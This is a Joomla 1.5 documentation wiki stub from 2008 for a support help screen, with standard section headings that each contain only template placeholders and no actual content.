On the J! Forum: http://forum.joomla.org/memberlist.php?mode=viewprofile&u=32483

Help15:Joomla.support.15

2008-04-12T21:46:09Z

Igeoffi: start page

==Description==
{{Help screen description placeholder}}

==Version Changes==
{{Help screen version changes placeholder}}

==Column Headers==
{{Help screen column headers placeholder}}

==Typical Usage==
{{Help screen typical usage placeholder}}

==Quick Tips==
{{Help screen quick tips placeholder}}

==Points to Watch==
{{Help screen points to watch placeholder}}

==Dependencies==
{{Help screen dependencies placeholder}}

[[Category:DocCamp]]